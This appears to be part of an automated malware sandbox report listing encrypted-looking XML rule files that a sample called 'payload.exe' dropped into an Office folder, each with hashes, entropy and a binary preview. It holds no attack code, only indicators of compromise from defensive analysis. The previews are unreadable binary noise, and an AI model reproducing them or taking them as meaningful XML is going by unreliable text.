                                                                                                                                                                      Preview:<?xml.^6t.;W..De.R.4...>..@...h#%O.9.,5o."..D....Kf...xkE.=...)V..?q.GA."[....#K..9|.L2.k..L..3...5i*..y.l../.r....&F9`C.P.U.A?.W....r^*l..`.......M....`...+Ok.a.....a@.. .KU..l........... ......S..........0%...s..P.D.H..M....q....g...}L../.(..Y...OP..k.k...\.m!.T=t...|}..!.E,g.7..j....@..U9.O.:N....5.D.j\..e.h.=...H.......`....._.....Fx....S.CSm..]]....,b..k..L-Z.....@HCY..+.Z...O...tu.W.... .j.^'...C.:.3.....S..~...$......]...\..!`.E....k.>.I?F....@.B..lq_Dfq.r..'.p0Y...,.;.f...........0.n..}C.....]X..6....Kf..;)..*...1=l...>t..0...\.A.)..0...;9.A...t4........3......R2...s=df%/].Rg..#H..1..e.0.r..p..n...c...+.LE.0'J.#..2.'... ...}v..~...Y..T..]7.x-aR. `...f...[.mA..5.....D(.-u;.p.q.R'k........3_....H.6p.QI...$.:Q...M8..jC./w.#7Ry^r..l.B.&..p.F... (..+..).7......$Evm.#w .o.........V.-e.w.+.x-....}.I....d.d.....v..Q..~./.T.U.`..g.xW.].f+....w;.mC..f..8J...I..=;..w...s~....k....|i.b..I;.`.....p9F.B...u..]..}...DA..k..(

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11768v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2487
                                                                                                                                                                      Entropy (8bit):7.936118602237428
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:o6Lbj8x0IHHWYk3nymnYPwcyb/N/93LxHDdKGATJEOB6oM0D:o6LbN4XVmnDb/xNLJZAOhc
                                                                                                                                                                      MD5:A60A7A73522E6A69705C731BA8A2596C
                                                                                                                                                                      SHA1:6C9EC359B665F0646AF978EA1F48B532EE331F07
                                                                                                                                                                      SHA-256:52A17973696CBE2CEF2295D6306AF98E30BC6175C6AC00E1D6CAD23E1DC39F6A
                                                                                                                                                                      SHA-512:94CACE7347813333196CC86BD3B4CE25AC4D1FF74D905F53E10FAE8D794F2FFE0821167BD7EA2DEF077F9ECA14A22E0D4BC6BFEB3C44B9DFEA5E1C9AA232D588
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..\@.l./s%3.vO..i..2@..]k.p..#0..E.. ....2.BG..qF..&l..&F....2..x.Z./.#.......7L`....E.bV..`I..n.P........[.".B...?,...)Yj..]HM..Q.l.:J-......}.C...g>.....X-..*.L..k...c.y....C..n......NYn....%I.(..t.8..7x.j.......#g...9h.,..f..c.a.....8#-.*...\..F,he.;...@H.......`.......(..(0{I.?f...`/$/..Z.|.6.8T'..t7..\........g.r....@.~7!r[.W..f.W"n3..F....|...'h.._.m....Tu.y....#c...#...I.. (N..s.I......R.."yW*...`.i..F.c.2.N..L.>Ree...h...P.N..r....J..Zz|5..K...x...=W.=..Ga..?[z..._.4..LMf.......E.....o1..Q...89d'"...f.pRA...E=....Ml6..i...t(.gi ,}.A.BwOI.I......=.Ao.Md.b.H5.W.-v.`42.y.k...ki..H.'......7.G.....j......b.......:..&..$."....df...*u....YU.i.Ak.v^.,.`L@H+.b.e.Sv......=...P..Ho...P.N4'...hY.wf....\.J<.-.\...(......):.W..#..!IC.uY..!.6.z.:......l..YT.=..g.9.2..h-1....x....#ucPz.(.vn#.....;N.`B..d._....Ku..v...}.$....>.8\...W...nZ....Q..^I>.F..84*.b.V......,...H6.qk..n...+/.=...^.......).e8.\|X..4Wz.'_.ft..E^.hsZl......\6.P).<.3...t.e.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11769v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):3132
                                                                                                                                                                      Entropy (8bit):7.942702878478522
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:AFIfSPHQk3/WzkrBshpvPlAY5r9CcGEdZo48Pb98HA2QQPxmBHFpbTb3xOD:AifPkWzkVspvPPtF1kb98gLQWfTb3s
                                                                                                                                                                      MD5:D26592F30EF6DA1DB7D97AA4DADC65E4
                                                                                                                                                                      SHA1:4695D24E24B3FAC296E9E16FCE13C141F580683C
                                                                                                                                                                      SHA-256:1D8E3921313779C838399AFD51B9EB1EDBDB9E2E1836764F0C1CC9253714299F
                                                                                                                                                                      SHA-512:EEDCEC33EE5D7D6DF64502E86B9DEB18DEED599338F1A1D53C3861D55FE5CBFA5F7ACD4FAB24AACC93B15BC99DD8292B2A8BEC45E74023170575BC54BFE00657
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.$.lD......*..C..A.5.m...Jgr..J...U.5Hu$.M.M.i;..,.?CzM`.....+.."&.~.Ou...n..<..L...;.-....~....j.....OB&.*..J.m.^..+.A..|qKA....G......:.>B.n......v...`...."o.,../D..........Zq....;..w~.x4....-E!c..@..j...[..W'T....Z...^.M.x+Fk.1Z....N5....N..Q.^.>...%S._.ut..9..l...m[.O.c. M.DV.6..0.....E........^e...?>..k.*.B...Ao..j...A.J7-........H....eu}5. J.5dZ_....4.%........%....\EY*4.X`..0..h.-b&.5.;JG..............6K.s.|.>W.h.j......*....)..gJ..k.5&-...E..I'..a....7........S...#Z^...e_..+C.v.A#...8.k.B.xc.4.)P...S.;...6=..~..'.OD...P.Q!F...j.......%{b.......I<..H...P......2.....p...3...|e...R.r...vcW....OoE2UBE......#.]n..?..=0r....f...W..yoY+b.l..y.,a.~....+.-9......{3.6.\........M]y.R#.\...k..7./...F.Si._.x......LU....Y!Zu0v.....O ..).......U...d..?y8.n.t"..[..@..........).^.f.$\r.!x.na.B.7(..Xc...:.......u...<..../E.!..i4...>.w....... .?..[..>e.O-..v.....N..+.... w.n[^I...Q.q..6...!/.@K}!...........Qo..#I.v.g.}..l.:.hC.r.w;O...}.o..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11770v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):4968
                                                                                                                                                                      Entropy (8bit):7.958749058453662
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:w3rYj8q8tdARRmeY3qQP45eF8fJMvVyAKXewoU3MY0BEQ8xafg3vIe:w3+8zkLgaQP45eFgAVyNewoUcXY3vIe
                                                                                                                                                                      MD5:6A82F79DEC42A9A86B0A03957AB9F636
                                                                                                                                                                      SHA1:39E0C1BF255EC75AAA78F17DD4732F10B042EAB4
                                                                                                                                                                      SHA-256:DE6255CB1DF336F56235122E88B646EFB9D4618F35D718F2CA84B66A2FEC8442
                                                                                                                                                                      SHA-512:647BE56CE4EDEADA57E8F5222779B6ED238EA43933E85D4568E50A2E46CBB5E8FC4A1B72A1EDAF45DCDA1A6A64DE4ECCA781BE37A8997140BFD2F0004E31C52E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..?.*.Ew...!...8.T6....H:+..Y.N....4.\.q....%..n..h.'5....n..P.x..0 u.cM...L..[.,.b...&b.`...N.`..Q..`lD..[.+...^......e...|gjD%.....0v.V..}Q.n....%..Q2.kB,P).....A9Z...89.m+LQ4...!.D...r........(qK.8.T.E.O..i.P...9.F....M...q...m:\#..2..*JX....d8..{.......`...M.l......._h./........5..:^..nX.....Wy..nF.*..^....-.r.6.JUW,...R.dU..6......S>....>A6S....O......y...F.V!.!....V.*.E..h.!........3.....pA...jM>.....~.. .....=..L.|X.f.r.i>.......K..t..+a.....P.w......-../.o.4;.h5.r...%...)..+....}.`..*.e..@....1..}2K.^.......N.\w...S.'..+:...h...SR....?......G.;.Q.....`1V..&9P=CF.m_/L.M..-.u... ._.}.3.iS.v.E=d/.......:k.t...A]6..Z..>[.....r)DE..sQ t.D(.r1.(.....b4.6Sv......k.%.y?c6.C....|n..T$.~..{..9ov1.Q5....RDo|...y....i.....Q......V...{.0... ...u....=[.o.5...3..~R......Bz.u...*...e.m..M.,...$....Y......p\........?.@./.....M......4.%<.fT.r_..h..u>iF.;xs.a..B.l.G..>Fg......ZYQ..4U$Qy..nn.. -.*..O..m..|..Z....-...1.T.9

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11771v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):7596
                                                                                                                                                                      Entropy (8bit):7.974746563602727
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:KW6SgFPN+Phud1b2UuW9vhDJd4xiGA9vr1h/oZsnQV:KW6FPN+Phinu+4xYjnw2+
                                                                                                                                                                      MD5:2F37321AECBE8CD2CB017D7D2BDDAB3E
                                                                                                                                                                      SHA1:B50C2E936760C79943EE1249803EEE425C172005
                                                                                                                                                                      SHA-256:79269B65A46A69B7B4EA543455C782A63078D3A8F0247C0CEF5E0AFC5F7B9251
                                                                                                                                                                      SHA-512:D985FC3E458B23685E595CF63959291485ACD635E464EEAD967DFD5798C770FB423FDE2E1CE8B4DADFAF3ABC2FBC3C7AB79F612F45B86E6EE473A4403276DE1E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.m.\.....twV,.%.yB.M...Ql.$..*.H........">K.....p#l.....~.T..XxyY..:u.s=..........4.p.f.4.....Fcp.z..._=R.....+....;...U.k..D5.&.-...}O........E...1.<.z.);1...Az.Qnp..QP@&&..mj.......;|.7X..i..`~(J..E{.Y.a4{.:'.iQQ.w..O..[m<.Q.y..=..?_}.P.5N@.1......rn.v.....\d.~...m.]..6.h.......be\.."....H.e...i.R:..Q.M..,y.u.L..*)..:U.).<.G.N.Dy.......fRa....n..%.;...N.k.lD..+..%.*..W...#...@..Y.W....g......T.w.?.....|...G...j..r..J..c..h#"O.;>...2...<....-B.@.cd.....eS.LJ..u-.A....9....-7@;.D>S...@.tS.......5.u@_..~.s..k..\T..H...|u^..N...DB........cT^t=.....MM.Q.?.O........m...nu..%.V...Ct.....K...(....+..=..w............V.HWzt.PN)Z.;.(n*X.h?.U...r........wD.'S(.sO{.._..$.G.t..+C.!X...).....=a....E`\qGh.Z....Zo.....t...[........&...0\.KN:........i..wi....P...RBI..h..X..b.*..E....x.SX....T.5.............h..=x.Nq....G..T.Y.......cE.ig.RIb&W..,....{...]^(..$.........d.26.9.~#."l.E.........G....rLW. ...u7....6.!d.>.7'.p.)o...f.B.|k2.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11792v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):7356
                                                                                                                                                                      Entropy (8bit):7.974802597528515
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:Pwv7L4fCPhUNR2NUFOZhz4aUGQ4v7Yk1j85Ieh/hG+0vakzasa:PkofCWMqFOP+4v7ljgT/USAasa
                                                                                                                                                                      MD5:ACEDCA010D009380053A2F59465BB7D7
                                                                                                                                                                      SHA1:639D978010EA44A13230D5B92AD9949C17D5DFAB
                                                                                                                                                                      SHA-256:535853C81D50546C0DC4A8A640110CA2D21FF8148FB5D9DAECE98F21F98384BB
                                                                                                                                                                      SHA-512:ED24D515A8F2D620935CFDC60BAEBE7C5C2E121B892A2DABE5B25A33B4688229B369FCAFDA37B3B5F0782427BFCC9B7061BF20408C8B1AA30BB92AB73E570E10
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.O1..D.RCB..:W..l.W..[.SP.&....mW>l.d..].r...S...0.`\..L!U7.G5*;YUr.....9.$.n..A,es...e#^...M.,......J(...b7.6. ...g...qa.r...3dM......<i.kS.&..(.+z........4.. ..$...$F*....\X5c&.22....6......R3.%L..!$.'.N.5.#..o<).-...........q[..!..Q9..l..9...]V..l..d.......]...C........c.*h.Z....4.If.h.$yS...rB4F........Wj.c.S......^...E.(....7.jE....O.z3....:.%8..j..c...".)].C.D.kGGLB....V...}.$W..y.p)..-...}p...f....q...'.....x...}5....:..|.z..>m...oK..L7\....{^Q..r..... .P'.,....bHF33......UK.=rH..X..#.$.D.f..T~..j...4..../i...e...%....yl......2...f...N!.....g...?.U.....<R.s<.p9...B.\.....4...ws...z...>....~y.v3.E.<......i.........%...hV.p..WH.k.......E.)..<...6n"..jP.h.....Ts..^.+1...HfH.$..Z......j.D...M>i..M.e6O?`.......4...j.0.e.n..f..A......]T.G.nM.E..h+...0..GA..N...-a.......a...l...Aq....:\....D..S.C...P..^...E......H...".$.!.`..V%.$.O..Q.&7K...?]x..n.....G.EG....vS}.P...&.1..U.}.f.8?1Y^..;N.$..1\..<.L.....+W..g.i....B.d...Fa!.Xws.G...)..?..zt.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11793v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1551
                                                                                                                                                                      Entropy (8bit):7.882759452060908
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:h4fHGmt3Gdgf7VxoRa3pXRUpGwmJTKhffRiaQ4+LD:+emSgJxoRCEmhufRir4I
                                                                                                                                                                      MD5:73522802EB8DAAFCD2CA5D792C8E8395
                                                                                                                                                                      SHA1:60A83FCD4A2A520E3A614FA38171CD122B6C0720
                                                                                                                                                                      SHA-256:A67BD4F25B2E15BDAE81BD82CEBF413552E1256C9C9D63E2B7E4034ED3F1E5BC
                                                                                                                                                                      SHA-512:66D5743E661E75E27F634E971840636F6806EE4B9547F34FE98F5F676CF4C54256AA0F34D263E1437E776857369DBB02D16B38E42482BD0F19B5508ED9AFE48B
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.E.t.}_.....[S....7.6.../....$p....on....+.b..Kcw..d'YD.{1Ut.....}.\n.1....N.vK..*..<.|...B...2@.BW........].{.1..N....w..t\@.........)M.+=7.$.H>.(jJ."8....b`BL....._...W..?....OG`.@.......7.......S......v|...,...V.$...Z.KA.'>g..z.w%.#....:.._..6....)..1bPa.;.J/.....l..D.|..Kv&...sk.xm....'....; ..0..A...5mG.x.C@...2.B}.....{8....Kh.$b...%W.2....N`..#..)P..&..ll...........b...~L\.r....}..Qp;7....b..H....e..0Z+..{.E.v[^..7.K.f..C..[5.$.(.l..0..ji.....X...W(.e.....@..w.}.u..oe.B..X.Gy....4......Tr.^......D|Rj..>.f.d^.-...m5......E...~....".....0...l..S~.c..&<.:..-9e.SQ`c.O.H..[....Q......e.N.De.XV._!)w)..g"....%C....>..-.BD..K.j3Ka.........h.>:..n]......y@VD> ).J.gc;~w&..."KGZR..L...pD[eS2.n_A.!...G......JC4~....bY..O....(.)......2 Mi....hSm...K.........W.z.sw.....b..N..@...Da..$.."&.^.|..Q.TA..........Yzy.o~....y.m...\.'>.[}.8.`6,..q.vaG2z.E[............e.b.>]...)c-...T.C....;.t..X...K<..}Y.P..3...=).VI.)..C......!A....8.f.ze...<.'.4.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11794v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1716
                                                                                                                                                                      Entropy (8bit):7.882612803307559
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:irj/7ql5Zafx4zvs9ZZH9o0A/uTbY7SDD:i7gMSs9ZZ20guTb00
                                                                                                                                                                      MD5:E6DE881022EE7F2EAB6D4CF816FB5F56
                                                                                                                                                                      SHA1:8D3A300D4066C9D1A4883D8654E33508C1A65B15
                                                                                                                                                                      SHA-256:6028054F42DAD0B85C85A99F33D59D44D8B4772DC611D90A16333EDDFE343408
                                                                                                                                                                      SHA-512:FFD5F119DB0E2B4C6F847D98141B39608C7A160F58123A04A75106A70CD7763A2694AB78E788E57F4D8C3402D241DB7FBD227875023A194EAA87D7E08DA87FA8
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml....7..,..4..D...{.....tEj..Kp....s...;J..x.Z.C.d.........w+z.+.1.zP...z.k.=.|.....p.39.$.Qq..D.G)+#./..u..m...(/.d..n.g.w.c.>......h.K0..E.P.)s-8s.E..D[.<..pE.7......./Q..-7.7....B..-<.6.V .7....36......xe.`TZN).MC......R...s.j.;.7j...~&'...#-.Oc.e..v...a....(..N...(.......b.].E.'...].....>NeP4...|h.*x......(.v....I....d5......"........e.m.!Th..^6.=c.x...}%......h.}#aY.?.a}@+.3....@k....U.n....5.Gh..i....=.A.....u........n.$uBw..Z..!...B..s..w..~..&......z..........P...........b.}.....&q).f....*?......`.. q8.....a....'.{...`.A9....Z..L.3..1....xu.+.D.F..tb.+I..$..z....{ZK...+?o.w ..y.g..j.D.._.y..I.:...S*2......c.5F.?r.2.*L..#.*....q=t...jA1.+=..P.ty...............oM...ZQ.x..$..5.u./...5...q.oO.FH&.(...w.|f....Z..S....z..?.y..1 {4"*.q......8..............u......}...J.....e.\x..>a.w'X.~q..(Dz...t.u...8.F....L.pa.........qO...c.(.?v'[..s.....r..m...m.L.-.....{.>]...3.Q.......K.2..^.[.j.nzmMmn...L....}.y..LT.:.....z.I......w.3.sp....

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11834v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1737
                                                                                                                                                                      Entropy (8bit):7.890118847152716
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:kP5i9m3h8krb8JlB+iPccmA4csargn5kOx0K6M4IuGvf/0iVs+t4JzkneEqwQXDs:I5i9on8J/hmzcREF93BVsS4JIno/XcD
                                                                                                                                                                      MD5:C51494FFEF7A121A8E5459D72124EE67
                                                                                                                                                                      SHA1:6527E40B3703C49C000C0134DD74A928B75E2B4F
                                                                                                                                                                      SHA-256:72355729923B5B627A3708DA2DA979A3AFA9CD65FC56C2C140BE4D6E81E40451
                                                                                                                                                                      SHA-512:C5AA565FC76F9EA7349FF1F71E345AE247DFDB0DF1E96E4E4760624DC50CE7561777E09D95408CE832983C3EFB6DA41965A9A758F63D7EB3207C76684EBBB859
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlT.....hQU...p....u..=7.;....:.x.......c4...?..dw...^.F..^_?k~*.:6.E.Y...m.V.Yx.D4=M..T.|RM..b...A\.(.4x..*.Ds\G..c.0.......,.N./.]....j.&!.c....1D.m..f...?.SGL.A>...4c#.....`6..g....`.E.~.....l..1......C#./..S./.8..[.6.>. .j..........FfVfi^F&.O.U...i...0.v.2.....U..E.9.cV..DK.. .(..x.".=u.3..W....28..!..X$+N....Fh1^.a.?..Y..{.q.a..%..|.....o..-...M.').4..-...*.l.Ua..8\".S..=.G.B.6z...V..N.....x.lZ...-/......v....X]?....'O....W.1....O.....X.:K.....3.....*-.l.\.mF>..p.C.k.R...o..n..x.W R.t.7P.8<..q5."..Q..=.[.:8.u.c.......I.\n{..'..$..7?....?.8..S.t;|...u.7.p.]ULd....3b.M..Z....u.<...$...C...[g&....q.'..f>M.;'|6.v.. .J.Z.d.....C...]b..76.......4...ooe&.~..5%..wm.Uh*..2..*\...Yk.E.H.N$.oW..7e.....Z$....L.N.V...GO4..!...Q....uH...."..J..S...`....`R../y...r.........*'....A}=BW..M.[c....N.b<..Gpl.d.............Ax....K..|J.{;..xu...s(U...;.......:.z0T..;.NV.w..../....KO...%c:e1.s..4.R\..&.+..y.-..:|...r}r......UIb6..=.!.m..I..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11882v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1448
                                                                                                                                                                      Entropy (8bit):7.872906395848484
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:bbHD2/g7hRAiiV6i4t4Uv0tZyuPDPnynV27BB2Z2jCDQjY/mTRXFdX3lO13C515N:vp7hOiiVC6U8tZHPjynVHcdfNZ1D
                                                                                                                                                                      MD5:E13964DAD9DA22FD459938DF2C62CDEA
                                                                                                                                                                      SHA1:6FD93DF554EA2E59B6777AC5A7B75BDB6A98CD18
                                                                                                                                                                      SHA-256:0424D7871E5EF08C7512BBA36EAAAD3E3718EAD618D4CDF857529805E9E3B2DE
                                                                                                                                                                      SHA-512:85C109BC9C54C6FDFE6FC061BEE3F83047B8C7C4969FC6B691CD6C41AF00552F9D7BCEBC7F64D344F26D6A07C7D4156A2FFAA1E6BBAA697A1701947793491485
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.$.T.S.W...`.\.h...;O..&....m~.....&'..# '.*.....{...{..O.!.cD.e..A5..I.t..u9...e...f......$J...R.rR..y..yNm..".hz.+...x.+;.~.gw@..<...i.b]....W..h_I.7T.,.=...@..p.=Y...N.....Kv.N...vmy..w..E.....m.j...5T..^. .n..46.Q.oU....ELY....%.T?.4.0..T......(...h....../K....W.!d.:...Jp.I....A...Z.H}.F.....B...m).W...4...!...Y..\"....n....._.x..:...z{..k.......)0.?H..d.S.h.R.Tp.....4..4.?^bZ..%...;..:...t.d...O............../...A.2.ny.3...=r.kc.vI..M'....?.'<..](.J...^>.A!...P?.........2...0...:.Ae.F.Pq.T......S%%.aj..>...:|p.eu..{...G..a..<...F.......#..../.r.q.&._"..[[..ZD... D....4~c..Cc.y...Z.}...<..Q....b3g..w....y.+.@..#...z.4..$.S.x.o\p..k.......c.x;....j....'..H....=...B.Q.*d.W..F..v\hi#..t........#.K}.%..Z.!.....:D.@..e..6.:.....2p\....Ab......hI........)d..7....\..;Z.......hO.-....G......OQ........(.....`03......$..-;*......`.{.[j.....N.}..6.WS85..$.....a.)=..xJ....Q.^.2.#..8..^..S..c..-F..z.Z+h2}fI.k.K{.....O..0...[.,K$.f.V..1..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11890v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1419
                                                                                                                                                                      Entropy (8bit):7.85972355493824
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:Fth8nLR0W8Q93mbyZBSGX4Sv1XriD95efDDLDHqNJRiFxBkDsO4tLbvRfivt2bD:Ft6t0493m6vXxtXriD2L+NJKVXvRKeD
                                                                                                                                                                      MD5:5A29147918758927A78631FD00A5C08A
                                                                                                                                                                      SHA1:7A3CA75001EBC09A5968237F2542569E455416C3
                                                                                                                                                                      SHA-256:1134C3DBF9089BD42A1D83DFC6104B002D1FF5F9498B1872A616865B543A757C
                                                                                                                                                                      SHA-512:8AC3D1B806116AE522442BC902E8EE1893A58F3702C0E239C03D91E73A22C6FF5FF0210354D7F7FB6FD4C0297B973EEA530DB5E296B8D40881A73BCD5DED041A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..e.d.R_i.G....~.....'..^.tZ.*..6.0.F:.4>)@.@6...p...7z.............-...<g.2........P.![.=H.w9.)....4...N+.T ..UKV......$..I2B%....G.be..x...M..p.i..u.:^?.E..U2................N.~hl.*.r.K.!m3e..o{..g:.<.)X-...~........B..U...?./..g.U1.....4..qw........Y<.p>.I.#.o..|...^"X?...(%....K..$.\......xJ4.`m.:a.,...V$8.{$.....L..}>LL.K..F.o..x_.@..Cn.d....Xy....q......AyP.Ly.3VQ..~.S........=;..k..$Z......c.yY..8.......b...P@....V;...@S4(..h1G.ac..C..u.V..I<...&...;(.5f.0.r.1.<R.m.<.u.....^g.R`N.................G....MQ.1$........7.}...Ha2.....sK..f......49...^cYi.cOp.=....d......\V.:.#..S....m./^.....!...m...(?=..l....&...//.F....=...c....Vf....~..M.E..F..!Z..n.3. QW........ .....gk.o...L*.5.h:!..;....k......1....27......s@pM.8_.Z$D..E.._U$..<.G.. ..$.M..........)=.%b..3r..K...q..>.....7....G..t...h...b...dVY0.9^...>.o.h.`..J'...L!!......3.. .I..B.|i'L..g..e.=.+......G.yT.....lB..55\.....hu.rz..k..F21..."..V!.....e..A.<1W_..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11930v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1546
                                                                                                                                                                      Entropy (8bit):7.867986978435837
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:BSK2sg/4liMtyI46VRCPbcloNP8coFYqpUWx1tQvaFzKGsOCglIEVIF6Kpu55G20:G4liXI46iTeopfoqShKGQE+Aqu73oD
                                                                                                                                                                      MD5:478A3F3EE48239876CD5CEC09B503A02
                                                                                                                                                                      SHA1:E3EA946BEB8FDA88D7009680AAFAA675C5134547
                                                                                                                                                                      SHA-256:DEAF55408122B67B8DBFC61DA47A67D5C3BEA4E76A3062FB4F2ED1C2314B663A
                                                                                                                                                                      SHA-512:C032FA4334BEA47BC7CC6DEEB5C87653E768CB69227790C12FA84DCED71E15CB5C6F03C1EB4DBEFE9A93B8720EEB46747D197082165B348F8FED7C95B5DEF46B
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlBY....{.J.{pR..m/....`...v.HU......x.VpQ@u-1r.U.....K.*8.+=...B..b..TR0.g..,.......I.....e..c.L{L{.+..[.p@\.8.....T....Jrn.....apv.nZ...*1.'..s.Cm.:...+fE1.{R.=...h..f... ...M%.N....t...uD.../C<...`.8`....,..]...B..w&...}.n2.......G... ..]....8...l{..V.....N..g..&.|..>.....A..&..0......#.pV.U6b.3.yQb.......?.....:...N..;T..B.......o....o.>)7..7o..1p"..,x.w...8.A.x].....k~.5a._...8..+.b....w=..j.DT.......8|.$.1f.#:..z..|.H..s8q..m.2&B..".X.Z.T{....e....Y.d./5;l.0e|.q..O.."..Y.....e...=...;........2.Q......!..|#.x......J.Y_..e.df..\.g......*.....4.,.......(v..1.6.o...;......~@.w.,..MR.o...q6........7....9..K..4d.}.$..h.......D+.F..oR.B..P...#U..0...wg..4..m\.)..m2.a6...jU.|.`i.._....M.rc.cz.........R..*......B...V..{.=Jlr.K=I..+.3....kn..$.*..o...qfG.....&.d). ...'I.A.iI^#qw.....`...>.D3.X.<....n......\..|............2.fHI......NG.gi...2.\.....=..Ld..x..J.C%.1Wdc...3.+n..3.....J...Gy..>E.,N....^.q...ia..SF..*.....!.6C..{.O.....F#.c.. .

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11931v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):903
                                                                                                                                                                      Entropy (8bit):7.769860735211285
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:1ZgJUXWYvXHimn1sRrcju7OR4xNjoWiDJOzHUuq44+T2bD:1yJPYfHixttrzU3JOzHNB4RD
                                                                                                                                                                      MD5:C93176B94401820A4FFE809A2DFBD4CA
                                                                                                                                                                      SHA1:15814EEC30FD95059DB130084E2657AA98FF315F
                                                                                                                                                                      SHA-256:3A21D1768632CC46C8757A5A678EC91B8F6AB2B516B2CC71A377B27476F74537
